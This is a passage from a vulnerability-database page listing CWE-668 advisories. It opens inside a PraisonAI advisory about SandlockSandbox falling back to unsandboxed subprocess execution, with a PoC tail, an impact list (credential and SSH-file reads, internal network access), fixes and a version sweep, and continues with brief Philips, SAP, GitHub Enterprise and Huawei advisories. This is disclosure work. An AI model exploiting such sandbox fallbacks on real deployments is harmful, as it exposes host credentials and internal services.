result.get(\"vulnerable\"):\n return 1\n return 0\n\nif __name__ == \"__main__\":\n raise SystemExit(main())\n```\n\n## PoC\n\nThe PoV section above contains the local reproduction command, input, and decisive output.\n\n## Impact\n\nIf a PraisonAI user or service relies on `SandlockSandbox` / native sandboxing for untrusted code isolation on a host without the required Landlock support, code submitted to the sandbox can execute with the host user\u0027s normal filesystem and network access.\n\nConcrete impact includes:\n\n- reading files outside the configured tenant/workspace path;\n- reading project files, credentials, `.env` files, SSH material, or cloud config reachable by the PraisonAI process user;\n- connecting to loopback or internal services despite `network=False`;\n- moving from sandboxed code execution to unsandboxed host-user code execution in deployments that treat Sandlock as the isolation boundary.\n\nThe local PoV does not read real sensitive files or contact external systems. It uses temporary tenant directories and a localhost TCP listener.\n\n## Suggested Fix\n\nFail closed when the requested native sandbox boundary cannot be enforced.\n\nRecommended changes:\n\n1. In `SandlockSandbox.execute()` and `run_command()`, return a failed `SandboxResult` or raise a clear runtime error when `self.is_available` is false.\n2. If fallback behavior is kept for developer convenience, require an explicit opt-in such as `allow_degraded=True` or `fallback=\"subprocess\"` and surface that degraded state in the result metadata.\n3. Do not preserve `sandbox_type == \"sandlock\"` in status metadata when the actual execution backend is subprocess.\n4. Add regression tests proving that unavailable Landlock does not execute code unless degraded fallback was explicitly requested.\n5. Add tests that a native policy with `network=False` and a restricted path cannot read outside-path canaries or connect to a localhost listener.\n6. Document the required kernel/ABI versions and the exact degraded-mode semantics.\n\n## Affected Package/Versions\n\n- Repository: `MervinPraison/PraisonAI`\n- Package: `praisonai`\n- Component: `src/praisonai/praisonai/sandbox/sandlock.py`\n- Related config component: `src/praisonai-agents/praisonaiagents/sandbox/config.py`\n- Latest verified release/current head: `v4.6.58`, `1ad58ca02975ff1398efeda694ea2ab78f20cf3e`\n\nConfirmed affected:\n\n```text\nv4.5.110 vulnerable\nv4.5.120 vulnerable\nv4.6.58 vulnerable\ncurrent vulnerable\n```\n\nNegative control:\n\n```text\nv4.5.109 not affected because SandlockSandbox is absent\n```\n\nSuggested affected range: `\u003e= 4.5.110, \u003c= 4.6.58`.\n\nNo fixed version is known at submission time.\n\n### Version Sweep\n\n```text\nversion has_sandlock sandlock_available status outside_read network_reply vulnerable\npraisonai-v4.5.109 false false\npraisonai-v4.5.110 true false COMPLETED TENANT_B_CANARY local-ok true\npraisonai-v4.6.58 true false COMPLETED TENANT_B_CANARY local-ok true\npraisonai-current true false COMPLETED TENANT_B_CANARY local-ok true\n```\n\nGitHub history for `sandlock.py` shows the backend was introduced in `4ee7d298c89f` on 2026-04-01 with \"graceful fallback to SubprocessSandbox\", then updated in `7ae6c6d19c31` on 2026-04-02 to use the current Landlock ABI check.\n\n## Advisory History\n\nNearby advisories are distinct:\n\n- `GHSA-r4f2-3m54-pp7q` / `CVE-2026-34955`: `SubprocessSandbox` shell command escape through `4.5.96`.\n- `GHSA-4mr5-g6f9-cfrh`, `GHSA-qf73-2hrx-xprp`, `GHSA-6vh2-h83c-9294`: `execute_code()` Python sandbox escapes.\n- `GHSA-ch89-h4r2-c8f8`: agent tools workspace escape via symlinks.\n- `GHSA-gcq3-mfvh-3x25`: PraisonAI Code agent tool workspace fail-open.\n\nThis report covers a different root cause: `SandlockSandbox` / native sandbox policy downgrade when Landlock is unavailable. It reproduces on the latest release `v4.6.58`, while the older `SubprocessSandbox` shell escape advisory was fixed at `4.5.97`.",
"id": "GHSA-6jcq-6546-qrrw",
"modified": "2026-06-18T14:27:19Z",
"published": "2026-06-18T14:27:19Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-6jcq-6546-qrrw"
},
{
"type": "PACKAGE",
"url": "https://github.com/MervinPraison/PraisonAI"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "PraisonAI SandlockSandbox falls back to unrestricted subprocess execution when Landlock is unavailable"
}
GHSA-6M7F-7867-PX97
Vulnerability from github – Published: 2022-05-24 16:59 – Updated: 2024-04-04 02:34In IntelliSpace Perinatal, Versions K and prior, a vulnerability within the IntelliSpace Perinatal application environment could enable an unauthorized attacker with physical access to a locked application screen, or an authorized remote desktop session host application user to break-out from the containment of the application and access unauthorized resources from the Windows operating system as the limited-access Windows user. Due to potential Windows vulnerabilities, it may be possible for additional attack methods to be used to escalate privileges on the operating system.
{
"affected": [],
"aliases": [
"CVE-2019-13546"
],
"database_specific": {
"cwe_ids": [
"CWE-668"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-10-25T18:15:00Z",
"severity": "HIGH"
},
"details": "In IntelliSpace Perinatal, Versions K and prior, a vulnerability within the IntelliSpace Perinatal application environment could enable an unauthorized attacker with physical access to a locked application screen, or an authorized remote desktop session host application user to break-out from the containment of the application and access unauthorized resources from the Windows operating system as the limited-access Windows user. Due to potential Windows vulnerabilities, it may be possible for additional attack methods to be used to escalate privileges on the operating system.",
"id": "GHSA-6m7f-7867-px97",
"modified": "2024-04-04T02:34:35Z",
"published": "2022-05-24T16:59:53Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-13546"
},
{
"type": "WEB",
"url": "https://www.us-cert.gov/ics/advisories/icsma-19-297-01"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-6MCP-RMFC-CQP5
Vulnerability from github – Published: 2022-07-13 00:00 – Updated: 2022-07-21 00:00Under special integration scenario of SAP Business one and SAP HANA - version 10.0, an attacker can exploit HANA cockpit?s data volume to gain access to highly sensitive information (e.g., high privileged account credentials)
{
"affected": [],
"aliases": [
"CVE-2022-32249"
],
"database_specific": {
"cwe_ids": [
"CWE-668"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-07-12T21:15:00Z",
"severity": "HIGH"
},
"details": "Under special integration scenario of SAP Business one and SAP HANA - version 10.0, an attacker can exploit HANA cockpit?s data volume to gain access to highly sensitive information (e.g., high privileged account credentials)",
"id": "GHSA-6mcp-rmfc-cqp5",
"modified": "2022-07-21T00:00:27Z",
"published": "2022-07-13T00:00:40Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-32249"
},
{
"type": "WEB",
"url": "https://launchpad.support.sap.com/#/notes/3212997"
},
{
"type": "WEB",
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-6MF2-C677-CHPV
Vulnerability from github – Published: 2023-03-07 18:30 – Updated: 2023-03-14 21:30An information disclosure vulnerability was identified in GitHub Enterprise Server that allowed private repositories to be added to a GitHub Actions runner group via the API by a user who did not have access to those repositories, resulting in the repository names being shown in the UI. To exploit this vulnerability, an attacker would need access to the GHES instance, permissions to modify GitHub Actions runner groups, and successfully guess the obfuscated ID of private repositories. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.7 and was fixed in versions 3.3.17, 3.4.12, 3.5.9, 3.6.5. This vulnerability was reported via the GitHub Bug Bounty program.
{
"affected": [],
"aliases": [
"CVE-2022-46257"
],
"database_specific": {
"cwe_ids": [
"CWE-668"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-03-07T17:15:00Z",
"severity": "MODERATE"
},
"details": "An information disclosure vulnerability was identified in GitHub Enterprise Server that allowed private repositories to be added to a GitHub Actions runner group via the API by a user who did not have access to those repositories, resulting in the repository names being shown in the UI. To exploit this vulnerability, an attacker would need access to the GHES instance, permissions to modify GitHub Actions runner groups, and successfully guess the obfuscated ID of private repositories. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.7 and was fixed in versions 3.3.17, 3.4.12, 3.5.9, 3.6.5. This vulnerability was reported via the GitHub Bug Bounty program.",
"id": "GHSA-6mf2-c677-chpv",
"modified": "2023-03-14T21:30:22Z",
"published": "2023-03-07T18:30:39Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-46257"
},
{
"type": "WEB",
"url": "https://docs.github.com/en/enterprise-server@3.3/admin/release-notes#3.3.17"
},
{
"type": "WEB",
"url": "https://docs.github.com/en/enterprise-server@3.4/admin/release-notes#3.4.12"
},
{
"type": "WEB",
"url": "https://docs.github.com/en/enterprise-server@3.5/admin/release-notes#3.5.9"
},
{
"type": "WEB",
"url": "https://docs.github.com/en/enterprise-server@3.6/admin/release-notes#3.6.5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-6MPR-VVFH-R7H5
Vulnerability from github – Published: 2023-07-06 15:30 – Updated: 2024-04-04 05:26Vulnerability of kernel raw address leakage in the hang detector module. Successful exploitation of this vulnerability may affect service confidentiality.
{
"affected": [],
"aliases": [
"CVE-2023-3456"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-668"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-07-06T13:15:11Z",
"severity": "MODERATE"
},
"details": "Vulnerability of kernel raw address leakage in the hang detector module. Successful exploitation of this vulnerability may affect service confidentiality.",
"id": "GHSA-6mpr-vvfh-r7h5",
"modified": "2024-04-04T05:26:32Z",
"published": "2023-07-06T15:30:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-3456"
},
{
"type": "WEB",
"url": "https://consumer.huawei.com/en/support/bulletin/2023/7"
},
{
"type": "WEB",
"url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202307-0000001587168858"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
No mitigation information available for this CWE.
No CAPEC attack patterns related to this CWE.